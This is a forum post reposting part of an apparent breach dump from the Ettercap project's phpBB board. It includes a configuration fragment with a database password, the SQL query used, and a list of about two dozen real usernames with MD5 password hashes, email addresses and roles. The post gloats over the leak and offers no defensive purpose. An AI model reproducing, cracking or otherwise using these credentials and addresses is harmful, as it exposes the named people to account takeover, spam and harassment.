|$dbpasswd = "ettersql_a";

|$table_prefix = "phpbb_";

define('PHPBB_INSTALLED', true);

define('DEBUG', true);

|?>

|$ SELECT phpbb_users.username, phpbb_users.user_password, phpbb_users.user_email,
phpbb_ranks.rank_title FROM phpbb_users LEFT JOIN phpbb_ranks ON user_rank = rank
id WHERE user_rank > 0 ORDER BY user_rank
NaGA:256ce2d528caee146c82f20a3378673f:naga@antifork.org:Ettercap Developer
ares:9c05a83765c4aad064d737496dae2dee:ares@inwind.it:Supporter
metaldemon:3ef4f11188954e64884037cae7c3e963:metaldemon@tiscalinet.it:Supporter
ttyp1:3c5e778f14dee668c0a9560fb8a6ced2:yokel4@anonymous.to:Betatester
drygol:c8214d5d4d4eb4b45d2bca063c07dd6a:pandrychowski@lpp.com.pl:Betatester
Gumble:ce7bcda695c30aa2f9e5f390c820d985:dukegumble@redseven.de:Betatester
Acelent:817b61c60959294d4250912f816f9451:acelent@gmail.com:Betatester
Jammer:a13f5ed8c46f26076c20fd4829901bc8:jammer@mauigateway.com:Betatester
m|n|moE:de9cb5d4ae42da6b8eb6623c322fa200:minimoe@home.se:Betatester
Crusher4:2df66ae5eb0807dd2b84933adf3c4981:Crusher4@mac.com:Betatester
MathieuMa:f8c22494a40f2c034aa73b891135da85:math.m@promac.org:Betatester
Mapes:3e1bbf17e6528381ae1e1e596733fb9a:bellizzi@pacbell.net:Betatester
garaged:3c2234a7ce973bc1700e0c743d6a819c:maxvaldez@yahoo.com:Betatester
Piw:a980baafb7bdb3d71aec6fc3776323ac:piw69@rpg.pl:Betatester
mod7:e40fbc4015c12f4c97e5e65b38127a96:ghy7765@yahoo.com:Betatester
stromax:274216f1c8423d3bad9cc3f684e31ffa:thomas@limone.ch:Betatester
DigitalDust:e80eded141e1295d694cd35cf2b8f675:jason@evilroot.net:Betatester
cableguy:37430a92973d1adca9934f0a5ecc53d2:cableguy@iname.com:Betatester
Suntac:9e220ad44ce3cae2c5dd5a6a6e770837:Suntac@dds.nl:Betatester
SGResu:0d736aad1ff5a82ca580e7980f2de88d:sgresu@hotmail.com:joker
LnZ:292b804c2895989cebef7340971d1e8d:lporro@libero.it:fac totum
megabug:74b468fafab62ade90622085691026dd:megabug@xerxes.stru.polimi.it:
Zero_Chaos:7b24afc8bc80e548d66c4e7ff72171c5:sidhayn@hotmail.com:Contributor
daten:eff1541059e9a263b245657e1805b339:daten@users.sourceforge.net:Contributor


Part 4 : Click Here
Back to top Go down
View user profile http://malaysia.1talk.net
 
Part 3 : hack got hacked.. happy reading anyone!!
View previous topic View next topic Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
Malaysian WackWall Forum :: Internet :: Berita Tentang Internet-
Jump to: